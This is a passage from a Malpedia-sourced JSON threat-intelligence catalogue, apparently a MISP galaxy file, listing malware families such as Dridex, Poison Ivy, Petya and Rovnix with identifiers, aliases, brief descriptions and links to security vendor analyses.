"http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html"
]
}
},
{
"uuid": "495377c4-1be5-4c65-ba66-94c221061415",
"value": "Corebot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf",
"http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/"
]
}
},
{
"uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a",
"value": "systemd",
"description": "General purpose backdoor",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en"
]
}
},
{
"uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff",
"value": "Slempo",
"description": "",
"meta": {
"synonyms": [
"SlemBunk"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html",
"https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html"
]
}
},
{
"uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed",
"value": "DownPaper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.clearskysec.com/charmingkitten/"
]
}
},
{
"uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e",
"value": "MobiRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/"
]
}
},
{
"uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489",
"value": "Hajime",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf",
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
"https://x86.re/blog/hajime-a-follow-up/",
"http://blog.netlab.360.com/hajime-status-report-en/",
"https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
"https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
"https://blog.netlab.360.com/quick-summary-port-8291-scan-en/",
"https://github.com/Psychotropos/hajime_hashes"
]
}
},
{
"uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836",
"value": "DarkShell",
"description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/"
]
}
},
{
"uuid": "2685ea45-06f4-46e0-9397-eff8844db855",
"value": "murkytop",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
]
}
},
{
"uuid": "1e1924b5-89cb-408b-bcee-d6aaef7b24e0",
"value": "KevDroid",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-reaper-groups-updated-mobile-arsenal/",
"https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html"
]
}
},
{
"uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e",
"value": "Powmet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/"
]
}
},
{
"uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2",
"value": "Luzo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2",
"value": "MILKMAID",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e",
"value": "Dridex",
"description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
"https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/",
"https://securityintelligence.com/dridexs-cold-war-enter-atombombing/",
"https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf",
"https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps",
"https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/",
"https://viql.github.io/dridex/",
"https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/",
"https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/"
]
}
},
{
"uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c",
"value": "NewsReels",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "88d70171-fc89-44d1-8931-035c0b095247",
"value": "Unidentified 041",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "542161c0-47a4-4297-baca-5ed98386d228",
"value": "Ramnit",
"description": "",
"meta": {
"synonyms": [
"Nimnul"
],
"type": [],
"refs": [
"https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/",
"http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html",
"http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
"https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/",
"http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
"https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf"
]
}
},
{
"uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722",
"value": "Zyklon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html"
]
}
},
{
"uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8",
"value": "Gratem",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose"
]
}
},
{
"uuid": "2297799c-f93c-4903-b9af-32b6b599912c",
"value": "GoldDragon",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
]
}
},
{
"uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616",
"value": "Fake Pornhub",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a",
"value": "Herbst",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware"
]
}
},
{
"uuid": "06e0d676-8160-4b65-b6ea-d7634c962809",
"value": "TeleBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/"
]
}
},
{
"uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4",
"value": "XOR DDoS",
"description": "Linux DDoS C&C Malware",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf",
"https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html",
"https://en.wikipedia.org/wiki/Xor_DDoS"
]
}
},
{
"uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f",
"value": "HtBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db",
"value": "Coinminer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/",
"https://secrary.com/ReversingMalware/CoinMiner/"
]
}
},
{
"uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96",
"value": "Apocalypse",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/"
]
}
},
{
"uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3",
"value": "Kwampirs",
"description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
]
}
},
{
"uuid": "59c161f4-bb09-4590-9eec-e4d5db3ecb2e",
"value": "win.remy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92",
"value": "Downeks",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412"
]
}
},
{
"uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3",
"value": "KoobFace",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457",
"value": "Tarsip",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a",
"value": "Lyposit",
"description": "",
"meta": {
"synonyms": [
"Lucky Locker",
"Adneukine",
"Bomba Locker"
],
"type": [],
"refs": [
"http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html",
"https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/",
"http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html"
]
}
},
{
"uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7",
"value": "Poison Ivy",
"description": "",
"meta": {
"synonyms": [
"pivy",
"poisonivy"
],
"type": [],
"refs": [
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/",
"https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/",
"http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant",
"https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
"https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii",
"https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/",
"https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf",
"https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/"
]
}
},
{
"uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431",
"value": "SAGE",
"description": "",
"meta": {
"synonyms": [
"Saga"
],
"type": [],
"refs": [
"https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
"https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga",
"http://malware-traffic-analysis.net/2017/10/13/index.html",
"https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/"
]
}
},
{
"uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9",
"value": "Remsec",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf"
]
}
},
{
"uuid": "a0881a0c-e677-495b-b475-290af09bb716",
"value": "Alma Communicator",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/"
]
}
},
{
"uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f",
"value": "OnlinerSpambot",
"description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.",
"meta": {
"synonyms": [
"SBot",
"Onliner"
],
"type": [],
"refs": [
"https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html"
]
}
},
{
"uuid": "f64683c8-50ab-42c0-8b90-881598906528",
"value": "Shakti",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/",
"https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/"
]
}
},
{
"uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145",
"value": "TabMsgSQL",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8",
"value": "Hermes",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html"
]
}
},
{
"uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa",
"value": "CherryPicker POS",
"description": "",
"meta": {
"synonyms": [
"cherrypicker",
"cherrypickerpos",
"cherry_picker"
],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/"
]
}
},
{
"uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b",
"value": "Ranscam",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintel.com/2016/07/ranscam.html"
]
}
},
{
"uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da",
"value": "ComodoSec",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt"
]
}
},
{
"uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e",
"value": "Wirenet",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
"https://news.drweb.com/show/?i=2679&lng=en&c=14"
]
}
},
{
"uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f",
"value": "Narilam",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html",
"https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage"
]
}
},
{
"uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22",
"value": "Skygofree",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/",
"https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf"
]
}
},
{
"uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621",
"value": "MPKBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/",
"https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
]
}
},
{
"uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886",
"value": "prb_backdoor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html"
]
}
},
{
"uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc",
"value": "Petya",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/",
"https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/",
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
"https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/",
"https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/"
]
}
},
{
"uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7",
"value": "OnionDuke",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.f-secure.com/weblog/archives/00002764.html",
"http://contagiodump.blogspot.com/2014/11/onionduke-samples.html"
]
}
},
{
"uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f",
"value": "Rovnix",
"description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).",
"meta": {
"synonyms": [
"BkLoader",
"Cidox",
"Mayachok"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/",
"https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0",
"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf",
"https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/",
"https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/",
"http://www.malwaretech.com/2014/05/rovnix-new-evolution.html",
"https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981",
"http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html"
]
}
}
],
"version": 1,
"source": "Malpedia",
"name": "Malpedia",
"uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e"
}
Reference in New Issue View Git Blame Copy Permalink